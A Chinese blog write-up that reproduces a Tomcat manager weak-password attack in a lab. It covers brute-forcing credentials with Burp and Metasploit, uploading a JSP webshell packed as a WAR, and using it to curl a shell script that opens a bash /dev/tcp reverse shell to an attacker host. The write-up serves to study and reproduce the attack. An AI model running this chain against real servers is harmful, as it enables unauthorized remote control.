Tomcat弱口令复现及利用


Posted in Servers onMay 06, 2022

漏洞描述

Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf\tomcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令。Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限。
Tomcat7+ 权限分为:
manager(后台管理)

manager-gui 拥有html页面权限
manager-status 拥有查看status的权限
manager-script 拥有text接口的权限,和status权限
manager-jmx 拥有jmx权限,和status权限
host-manager(虚拟主机管理)

admin-gui 拥有html页面权限
admin-script 拥有text接口权限
二、漏洞影响
Tomcat <= 6.0.0 默认用户名为admin,密码为空,无暴力破解限制。
Tomcat >= 6.0.0 无默认用户,五次失败后,账户即被锁定。
但是正常安装的情况下,tomcat8 中默认没有任何用户,且 Manager 页面只允许本地 IP 访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。

复现

环境

一台攻击机(kali-2021)192.168.141.190
受害机(vulhub搭建的)192.168.141.194
一台用来下载反弹shell脚本的服务器(内网,如果有服务器更好)192.168.141.128(利用时让受害主机下载shell文件实现反弹shell)

攻击流程

按照前人经验可以使用burpsuite进行爆破或者使用msf进行爆破
首先是根据burpsuite进行爆破:
抓取请求数据包可以看到

Tomcat弱口令复现及利用

=其中没有看到熟悉的账号密码,但是其中’Authorization: Basic dG9tY2F0OnRvbWNhdA=='将其中的base64字符串解密可以看到结果格式为"tomcat:tomcat"所以将请求包送至爆破模块,构造格式为x:x的payload

Tomcat弱口令复现及利用

Tomcat弱口令复现及利用

Tomcat弱口令复现及利用

Tomcat弱口令复现及利用

结果中的200即为成功,但是前面说明了tomcat8或有防爆破机制,当一个用户名登录超过五次就会锁定账户,网上有说要用"tomcat暴破图形化—绕过tomcat 6/7/8的防暴破机制"这个脚本来绕过但是作者没有找到免费的,就不测试了.
其次使用过msf进行爆破

Tomcat弱口令复现及利用

msf中找到上面的模块配置出options的rhosts和rport就可以进行爆破(run)了

Tomcat弱口令复现及利用

可以看到用户名和密码在都是tomcat的时候爆破成功,而且可以看到msf应该是自带了绕过防爆破脚本,而且可以通过自定义user和password文件进行测试,所以作者更推荐使用msf爆破方式

利用

msf利用

这里强调一下,在作者复现网上说的使用exploit/multi/http/tomcat_mgr_deploy但是在配置好rhoss和rport进行run的时候出现无法拿到shell问题

Tomcat弱口令复现及利用

所以作者使用了exploit/multi/http/tomcat_mgr_upload进行利用配置同deploy,配置httpusername,httppassword,rhosts.rport 然后运行拿到shell

Tomcat弱口令复现及利用

反弹shell利用

整体思路:首先在网页端登录进管理后台上传jsp后门文件,然后访问这个jsp后门即可,虽然上传之后就可以通过shell软件控制,但是为了复习反弹shell的过程,作者将进一步通过上传的jsp一句话木马(也可以上传大马)进行反弹shell.

首先将一句话shelloneword.jsp(一句话木马文件)通过命令,jar cvf shelloneword.war shelloneword.jsp 执行成功后在管理后台找到如下然后上传

Tomcat弱口令复现及利用

Tomcat弱口令复现及利用

成功之后可以在这看到结果

之后通过各种软件访问http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i= xxxx就行了

但是作者的方式是通过让受害主机访问服务器主机下载shell文件,进行反弹shell,所以前面只是中间过程,首先让受害主机执行i=curl -o /shell.sh http://192.168.141.128/shell.txt 其中shell.txt文件内容为

bash -i >& /dev/tcp/192.168.141.190/7777 0>&1

将ip和端口改为自己的,然后打开nc 监听7777端口,访问http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i=bash /shell.sh

Tomcat弱口令复现及利用

反弹shell成功

参考文章

[1] https://blog.csdn.net/qq_33020901/article/details/98357659
[2] https://blog.csdn.net/weixin_44037296/article/details/116376114
[3] https://blog.csdn.net/qq_43665434/article/details/116903953
[4] https://www.cnblogs.com/henry666/p/14379888.html
[5]https://www.cnblogs.com/qianxinggz/p/13440366.html
[6]https://blog.csdn.net/weixin_42432317/article/details/90208213

到此这篇关于Tomcat弱口令复现及利用的文章就介绍到这了!


Tags in this post...

Servers 相关文章推荐
nginx处理http请求实现过程解析
Mar 31 Servers
nginx基于域名,端口,不同IP的虚拟主机设置的实现
Mar 31 Servers
Nginx工作原理和优化总结。
Apr 02 Servers
apache基于端口创建虚拟主机的示例
Apr 24 Servers
Nginx+Tomcat负载均衡多实例详解
Apr 11 Servers
idea下配置tomcat避坑详解
Apr 12 Servers
Windows Server 2008 修改远程登录端口以及配置防火墙
Apr 28 Servers
解决Windows Server2012 R2 无法安装 .NET Framework 3.5
Apr 29 Servers
项目中Nginx多级代理是如何获取客户端的真实IP地址
May 30 Servers
CentOS7环境下MySQL8常用命令小结
Jun 10 Servers
winserver2019安装软件一直卡在应用程序正在为首次使用做准备
Jun 10 Servers
Windows Server 2012 R2服务器安装与配置的完整步骤
Jul 15 Servers
Vscode中SSH插件如何远程连接Linux
nginx配置限速限流基于内置模块
May 02 #Servers
Nginx配置之禁止指定IP访问
centos7安装mysql5.7经验记录
May 02 #Servers
使用 Docker Compose 构建复杂的多容器App
Apr 30 #Servers
搭建Yolov5服务器
KVM基础命令详解
Apr 30 #Servers
You might like
php xml-rpc远程调用
2008/12/19 PHP
php 解决旧系统 查出所有数据分页的类
2012/08/27 PHP
ThinkPHP使用smarty模板引擎的方法
2014/07/01 PHP
PHP5.2中PDO的简单使用方法
2016/03/25 PHP
php输出图像的方法实例分析
2017/02/16 PHP
PHP使用mysqli同时执行多条sql查询语句的实例
2019/03/22 PHP
PHP程序员简单的开展服务治理架构操作详解(二)
2020/05/14 PHP
phpStorm2020 注册码
2020/09/17 PHP
document.compatMode介绍
2009/05/21 Javascript
jquery不会自动回收xmlHttpRequest对象 导致了内存溢出
2012/06/18 Javascript
jQuery lazyLoad图片延迟加载插件的优化改造方法分享
2013/08/13 Javascript
jquery使用ul模拟select实现表单美化的方法
2015/08/18 Javascript
JS组件Bootstrap Table布局详解
2016/05/27 Javascript
vue项目中v-model父子组件通信的实现详解
2017/12/10 Javascript
vue自定义指令directive实例详解
2018/01/17 Javascript
vue中实现左右联动的效果
2018/06/22 Javascript
在vue中给列表中的奇数行添加class的实现方法
2018/09/05 Javascript
详解为生产环境编译Angular2应用的方法
2018/12/10 Javascript
Vue实现简易计算器
2020/02/25 Javascript
微信小程序将页面按钮悬浮固定在底部的实现代码
2020/10/29 Javascript
全面解读Python Web开发框架Django
2014/06/30 Python
使用Python生成随机密码的示例分享
2016/02/18 Python
python机器学习理论与实战(五)支持向量机
2018/01/19 Python
python3读取excel文件只提取某些行某些列的值方法
2018/07/10 Python
如何利用Python给自己的头像加一个小国旗(小月饼)
2020/10/02 Python
Python获取指定网段正在使用的IP
2020/12/14 Python
美国最大的网上冲印店:Shutterfly
2017/01/01 全球购物
瑞典时尚服装购物网站:Miinto.se
2017/10/30 全球购物
屈臣氏乌克兰:Watsons UA
2019/10/29 全球购物
如何进行Linux分区优化
2013/02/12 面试题
销售部主管岗位职责
2013/12/18 职场文书
社区工作感言
2014/02/21 职场文书
交通事故赔偿协议书
2014/04/15 职场文书
小学生保护环境倡议书
2014/05/15 职场文书
电气工程及其自动化专业求职信
2014/06/23 职场文书
孔子观后感
2015/06/08 职场文书